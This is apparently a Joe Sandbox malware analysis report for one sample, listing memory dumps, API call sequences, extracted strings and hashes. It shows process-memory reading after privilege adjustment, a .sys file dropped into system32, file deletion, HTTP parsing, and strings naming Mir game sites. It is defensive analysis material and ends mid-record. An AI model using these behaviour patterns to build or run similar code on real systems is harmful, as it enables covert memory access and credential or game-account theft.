                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                  • String ID: (
                                                                                  • API String ID: 808654186-3887548279
                                                                                  • Opcode ID: f8e6dd5f47000b6d001453544eaa8031853b7e64cad323c30f2cb569956abd12
                                                                                  • Instruction ID: 00e2f17242a11c48804ba38f24e9712fb217a8d0ebe7f8532eb8e72e54f1b25b
                                                                                  • Opcode Fuzzy Hash: f8e6dd5f47000b6d001453544eaa8031853b7e64cad323c30f2cb569956abd12
                                                                                  • Instruction Fuzzy Hash: DD513172900119AFDB01CFA9CD85EEEBBBAEF48314F164525E915F7141DB30ED428B64
                                                                                  APIs
                                                                                  • recv.WS2_32(?,?,00000001,00000000), ref: 6A6E4E17
                                                                                  • _strncmp.LIBCMT ref: 6A6E4E83
                                                                                  • _swscanf.LIBCMT ref: 6A6E4ECC
                                                                                    • Part of subcall function 6A7000D8: _vscan_fn.LIBCMT ref: 6A7000EF
                                                                                  • _memset.LIBCMT ref: 6A6E4FAA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset_strncmp_swscanf_vscan_fnrecv
                                                                                  • String ID: Content-Range: bytes $Content-Range: bytes %I64d-%I64d/%I64d$HTTP/$HTTP/%f %d $http://
                                                                                  • API String ID: 3799276779-4277459499
                                                                                  • Opcode ID: a4d51cc7489cd5ce5dc429d99e623d1c833bdcd209708fcc96841be5cc254e8e
                                                                                  • Instruction ID: 64ce07ac3da96626305d2d322036789f0f565dcf8be792a911a9c7a29fdfc337
                                                                                  • Opcode Fuzzy Hash: a4d51cc7489cd5ce5dc429d99e623d1c833bdcd209708fcc96841be5cc254e8e
                                                                                  • Instruction Fuzzy Hash: 42916CB150A3419FD320CF68C88495BB7F5BBC5314F514A2DF1AA87291EF72E90A8B52
                                                                                  APIs
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DC282
                                                                                  • OutputDebugStringA.KERNEL32(6A71C93C), ref: 6A6DC2A0
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DC2A7
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DC2C1
                                                                                  • __wfopen_s.LIBCMT ref: 6A6DC310
                                                                                  • OutputDebugStringA.KERNEL32(6A71C924), ref: 6A6DC32E
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DC335
                                                                                    • Part of subcall function 6A6D2A20: _memset.LIBCMT ref: 6A6D2A49
                                                                                    • Part of subcall function 6A6D2A20: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 6A6D2A5E
                                                                                    • Part of subcall function 6A6D2A20: wsprintfA.USER32 ref: 6A6D2A7F
                                                                                    • Part of subcall function 6A6D2A20: GetTickCount.KERNEL32 ref: 6A6D2A8B
                                                                                    • Part of subcall function 6A6D2A20: GetCurrentProcessId.KERNEL32 ref: 6A6D2A98
                                                                                    • Part of subcall function 6A6D2A20: __wfopen_s.LIBCMT ref: 6A6D2AE8
                                                                                    • Part of subcall function 6A6D2A20: OutputDebugStringA.KERNEL32(?), ref: 6A6D2AFC
                                                                                    • Part of subcall function 6A6D2A20: OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D2B03
                                                                                  • OutputDebugStringA.KERNEL32(CreateGameDllMap: not support yet), ref: 6A6DC391
                                                                                  • OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6DC398
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString$__wfopen_s$Current$CountDirectoryProcessTick_memsetwsprintf
                                                                                  • String ID: C:\pl.txt$CreateGameDllMap: not support yet
                                                                                  • API String ID: 3595199882-2831999525
                                                                                  • Opcode ID: 3a17f3642c0c0894a8ebd4422544b8e22a73330a842e3ad20789d8cb8167db31
                                                                                  • Instruction ID: 2bce513d573f4d30444648dd233bf23975e01e3d74b37f0b87cea1fddc6dce8e
                                                                                  • Opcode Fuzzy Hash: 3a17f3642c0c0894a8ebd4422544b8e22a73330a842e3ad20789d8cb8167db31
                                                                                  • Instruction Fuzzy Hash: 8F31EAB390820467DB10DBA5DC80E6B77E9EBC6265F0A0929FA4593211DF20FD1DC7D2
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,6A6D653A,?), ref: 6A6D5DE6
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,6A6D653A,?), ref: 6A6D5DFD
                                                                                  • CloseHandle.KERNEL32(00000000,?,?,6A6D653A,?), ref: 6A6D5E0E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                  • String ID: 361m2com$Askm2com$HGEM2$Www.MirGom.Com
                                                                                  • API String ID: 1378416451-3242331594
                                                                                  • Opcode ID: e3155a935fb56149bfdb0650676a58454c4da8a20cd64488695dfb94afef2e37
                                                                                  • Instruction ID: fb93301f609f6c31d7a136ff42286070f6cdbf4aea145db2ea52ef1e6ca73d7b
                                                                                  • Opcode Fuzzy Hash: e3155a935fb56149bfdb0650676a58454c4da8a20cd64488695dfb94afef2e37
                                                                                  • Instruction Fuzzy Hash: 19514B716042045FE3006A78DC88BAA77D9DB863B5F140635F851CF7A2EF76DC0947A1
                                                                                  APIs
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0BEB596B
                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 0BEB5975
                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0BEB5995
                                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 0BEB59AC
                                                                                  • GetDC.USER32(00000000), ref: 0BEB59B8
                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0BEB59E5
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0BEB5A0B
                                                                                  • SelectObject.GDI32(?,?), ref: 0BEB5A26
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0BEB5A35
                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0BEB5A61
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0BEB5A6F
                                                                                  • SelectObject.GDI32(?,00000000), ref: 0BEB5A7D
                                                                                  • DeleteDC.GDI32(?), ref: 0BEB5A93
                                                                                  • DeleteDC.GDI32(?), ref: 0BEB5A9C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmp
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                                                  • String ID:
                                                                                  • API String ID: 644427674-0
                                                                                  • Opcode ID: a47357e9efbf185a66b5b986cd689ea131b4a1227af2a9a0ee79397e5b8497ef
                                                                                  • Instruction ID: e21c0bdf7b8959dc52986d33b5e71ef2d65a03843e72648878bbc2938b2324fc
                                                                                  • Opcode Fuzzy Hash: a47357e9efbf185a66b5b986cd689ea131b4a1227af2a9a0ee79397e5b8497ef
                                                                                  • Instruction Fuzzy Hash: C141B971E50209AFDB51EBE8D892FAFB7FCAB09710F415465B614E7240D774AD088BA0
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6E1BC8
                                                                                  • _memset.LIBCMT ref: 6A6E1BE2
                                                                                  • _memset.LIBCMT ref: 6A6E1BFC
                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 6A6E1C11
                                                                                    • Part of subcall function 6A6DAF10: _memset.LIBCMT ref: 6A6DAF34
                                                                                    • Part of subcall function 6A6DAF10: wsprintfA.USER32 ref: 6A6DAFBF
                                                                                  • wsprintfA.USER32 ref: 6A6E1C68
                                                                                  • DeleteFileA.KERNEL32(?), ref: 6A6E1D18
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$wsprintf$DeleteDirectoryFileWindows
                                                                                  • String ID: %s\system32\%s$.sys$a3gree$dxtta$i3lseks.zip$wxiisd.zip
                                                                                  • API String ID: 1056433381-1250312934
                                                                                  • Opcode ID: 9e942fb40bf5ff68e316fb23f4fe419848d651422e85cc1296ed06f391348ec1
                                                                                  • Instruction ID: a42f520eef3f6bdc9252009a94661e6115d06b5c7adec986b89b1547d7183739
                                                                                  • Opcode Fuzzy Hash: 9e942fb40bf5ff68e316fb23f4fe419848d651422e85cc1296ed06f391348ec1
                                                                                  • Instruction Fuzzy Hash: 4A41E6B160D3455BD720DF648888ADBB7E8BB95348F46082CE599C7201EF74994EC7B2
                                                                                  APIs
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • ReadProcessMemory.KERNEL32 ref: 6A6D8F13
                                                                                  • ReadProcessMemory.KERNEL32(00000000,00471CDC,isre,00000012,00471844), ref: 6A6D8F58
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6D8F98
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Memory$Process$Virtual$AllocateInformationOpenQueryReadSystem$AdjustCloseFreeHandlePrivilege
                                                                                  • String ID: .$E$G$H$e$isre$r$s$v
                                                                                  • API String ID: 2751502915-1798147963
                                                                                  • Opcode ID: 9de2d630185ed565135bb38f3d5cfb444dec0a2bf0afaf458f83848f5f1ae715
                                                                                  • Instruction ID: b06b3a292e9f35a02c85740d33f08ec0f5e76398a2bf7df9d3f09a5fe49eeaf0
                                                                                  • Opcode Fuzzy Hash: 9de2d630185ed565135bb38f3d5cfb444dec0a2bf0afaf458f83848f5f1ae715
                                                                                  • Instruction Fuzzy Hash: C441E62110C3C09EE341DF28C484A6FBFE29F96788F48599DF1C557262D766D509C727
APIs
• _memset.LIBCMT ref: 6A6D106B
  • Part of subcall function 6A6D5440: CoCreateInstance.OLE32(6A71AF30,00000000,00000001,6A71AF20,?,?), ref: 6A6D5479
• _memset.LIBCMT ref: 6A6D109F
• _strncpy.LIBCMT ref: 6A6D10C0
• _strncpy.LIBCMT ref: 6A6D10CC
• __wfopen_s.LIBCMT ref: 6A6D10EB
• OutputDebugStringA.KERNEL32(GetShortCutFile has arguments), ref: 6A6D1105
• OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D110C
• __wfopen_s.LIBCMT ref: 6A6D112A
• OutputDebugStringA.KERNEL32(?), ref: 6A6D113E
• OutputDebugStringA.KERNEL32(6A71B18C), ref: 6A6D1145
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmp
• Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: DebugOutputString$__wfopen_s_memset_strncpy$CreateInstance
• String ID: C:\pl.txt$GetShortCutFile has arguments
• API String ID: 2386831223-3219341379
• Opcode ID: 994138fd7480203e42bb0949552263d49ed01b7072132adc33201a8d8b1c99c1
• Instruction ID: 3a22b798c6d1ea63822e241fd487078bf5d38adaaa6aac59d3b16485333af2df
• Opcode Fuzzy Hash: 994138fd7480203e42bb0949552263d49ed01b7072132adc33201a8d8b1c99c1
• Instruction Fuzzy Hash: 1031C471448300ABD210DB549D45FAB7BF8AFD6248F050919F69493241DF71AA1CCBE3
APIs
  • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
  • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
  • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
  • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
  • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
  • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
  • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
  • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
• ReadProcessMemory.KERNEL32 ref: 6A6D8DFC
• CloseHandle.KERNEL32(00000000), ref: 6A6D8E31
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: the same fourteen dumps (6A6D0000 through 6A77E000) listed in full above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
• API ID: Memory$ProcessVirtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilegeRead
• String ID: yX$2$:$a$c$h$m$o$p$x
• API String ID: 3726627124-3589007719
• Opcode ID: 006ef2e45278129c822924e02ae2e7cd696a1adb695aafdf0baf7be9f8eb1629
• Instruction ID: 8336e62996145771d454de18d64741ee34839071a31bff24f19b8fcc1263adaf
• Opcode Fuzzy Hash: 006ef2e45278129c822924e02ae2e7cd696a1adb695aafdf0baf7be9f8eb1629
• Instruction Fuzzy Hash: 5231457150D3C09ED341DF68848468FBFE16FEA248F88199DF0C897352D665DA09CB67
APIs
  • Part of subcall function 6A6E02D0: _memset.LIBCMT ref: 6A6E0354
  • Part of subcall function 6A6E02D0: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 6A6E0366
  • Part of subcall function 6A6E02D0: Module32First.KERNEL32 ref: 6A6E0380
  • Part of subcall function 6A6E02D0: Module32Next.KERNEL32(00000000,?), ref: 6A6E03D9
  • Part of subcall function 6A6E02D0: CloseHandle.KERNEL32(00000000), ref: 6A6E03E3
• _strncmp.LIBCMT ref: 6A6DA012
• _strncmp.LIBCMT ref: 6A6DA033
Strings
Memory Dump Source
• Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
• Associated: the same fourteen dumps (6A6D0000 through 6A77E000) listed in full above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
Similarity
